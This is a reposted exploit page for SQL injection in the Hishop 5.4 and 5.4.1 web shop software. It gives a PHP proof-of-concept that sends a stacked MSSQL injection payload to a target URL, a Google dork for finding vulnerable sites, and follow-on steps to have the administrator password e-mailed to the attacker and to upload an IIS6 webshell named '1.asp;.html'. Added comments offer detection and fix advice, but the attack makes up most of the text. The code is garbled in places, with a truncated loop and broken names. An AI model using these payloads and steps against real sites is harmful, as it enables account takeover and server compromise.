Hishop 5.4 & 5.4.1 SQL injection漏洞预警 -电脑资料


   

    # Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]

    # Date: [06-04-2012]

    # Author: [Hacker-Fire]

    # Vendor or Software Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]

    # Version: [ 5.4 & 5.4.1 ]

    # Category:: [ webapps]

    # Google dork: [intext:Hishop 5.4]

    # Tested on: [Windows 7 ]

    ##################################################

    [~] P0c [~] :

   

    // Prints an attribution banner, then a usage message if too few
    // command-line arguments were supplied.
    // NOTE(review): this copy was mangled by the hosting page (stray spaces in
    // "$ argc", "$ Argv", inconsistent variable casing), so it is not valid PHP
    // as shown. The comments describe what the visible text does, for analysis
    // only.
    print_r ('

    + ------------------------- +

    Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire

    + ------------------------- +

    ');

    // Argument-count guard: prints the expected positional arguments
    // (Host Port Path RegMail) and stops.
    if($ argc <3) {

    print_r ('

    + ------------------------- +

    Usage: php '. $ Argv [0].'Host Port Path RegMail

    Example:

    php '. $ argv [0].'localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 ​​syc@myclover.org

    + ------------------------- +

    ');

    exit;

    }

    // Positional arguments: target host, TCP port, request path (in the usage
    // example a category page with a "valueStr" query parameter) and an
    // e-mail address.
    $ Host = $ argv [1];

    $ Port = $ argv [2];

    $ Path = $ argv [3];

    $ Mail = $ argv [4];

    // Hex-encodes the e-mail address one character at a time, appending "00"
    // after each byte (presumably to form two-byte characters for the NVARCHAR
    // cast below; confirm against the original).
    // NOTE(review): the loop header is cut off in this copy (everything after
    // "$ i" is missing), so its bound and increment cannot be confirmed here.
    $ Expdata = "";

    for($ i = 0; $ i

    $ Expdata = $ expdata. Dechex(ord ($ mail [$ i])). "00";

    $ Expdata = strtoupper($ expdata);

    // Wraps the hex string in the injected request suffix: a URL-encoded quote
    // and parenthesis, an always-true "or 1 = 1" condition, then a stacked
    // batch that DECLAREs a variable, CASTs the hex string (plus "2700", an
    // encoded single quote) to NVARCHAR and hands it to EXEC, ending in a
    // comment marker. What statement finally runs cannot be determined from
    // this copy.
    // Defender notes: a query string containing DECLARE, CAST( ... AS NVARCHAR
    // and EXEC( is a strong injection indicator in web-server and WAF logs.
    // The root-cause fix is to bind the affected request parameter through
    // parameterised queries and to run the application under a database login
    // that cannot execute stacked, dynamically built batches.
    $ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - ";

    // Sends the request once. The literal 30 is passed as $timeout.
    GET ($ host, $ port, $ path, $ expdata, 30);

    // GET: opens a TCP socket to host:port, writes one raw HTTP/1.1 GET whose
    // request target is $path followed by $data, then reads the response until
    // EOF and discards it.
    // $timeout and $cookie are accepted but never referenced in the visible
    // body; fsockopen is given the literal 30 instead.
    // NOTE(review): the signature and variable names are mangled in this copy
    // ("functionGET", an unbalanced quote in the $cookie default, "$ ut" vs
    // "$ Out"), so the function does not parse as shown.
    functionGET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") {

    $ Fp = fsockopen($ host, $ port, $ errno, $ errstr, 30);

    // On connection failure, print the socket error text and number and stop.
    if(! $ fp) {

    echo"{$ the errstr} ({$ errno is})
\ n";

    exit;

    }

    // The request carries only Host and Connection headers (no User-Agent, no
    // cookies). Defender note: header-sparse requests like this, combined with
    // SQL keywords in the URL, are a useful log and WAF heuristic.
    $ ut = "GET $ path $ data HTTP/1.1 \ r \ n";

    $ Out. = "The Host: $ host: $ port \ r \ n";

    $ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n";

    fwrite ($ fp, $ out);

    // Drain the response with fgets() calls of length 128. The return value is
    // not stored, so the script never inspects the server's reply.
    while(! feof($ fp)) {

    fgets($ fp, 128);

    }

    fclose ($ fp);

    }

    // Prints the author's follow-on notes. Nothing in this string is executed.
    // It appears to describe two stages: having the administrator password
    // e-mailed via the site's account pages, and uploading a file named like
    // "1.asp;. Html" through the admin category-template feature, labelled as
    // applying to IIS6.
    // Defender notes: the second stage depends on IIS 6 treating a file name
    // with ";" after ".asp" as an ASP script. Upload handlers should validate
    // the whole file name against an extension allowlist and reject ";".
    // Theme and upload directories should have script execution disabled.
    // Unexpected files under the Themes/.../categorythemes path named below,
    // or changes to an administrator's e-mail address followed by a password
    // recovery request, are worth alerting on.
    print_r ('

    + ------------------------- +

    [+] Get Manager, the Password

    [1] to [landing] - "[My Account] -"[personal information】

    [2] E-mail the administrator password.

    [3] the Good Luck!

    + ------------------------- +

    [+] Get the WebShell (the IIS6)

    Log in from [1] / admin / [commodity management] - "[Category template set】

    [2] the upload 1.asp;. Html

    [3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html

    + ------------------------- +

    ');

    ?>

    ##########################################################

    [»] Greetz to :

    [ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]

    [ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]

    [ And all my Freinds + Algerian Hackers ]

    ##########################################################

    # 1337day.com [2012-04-06]
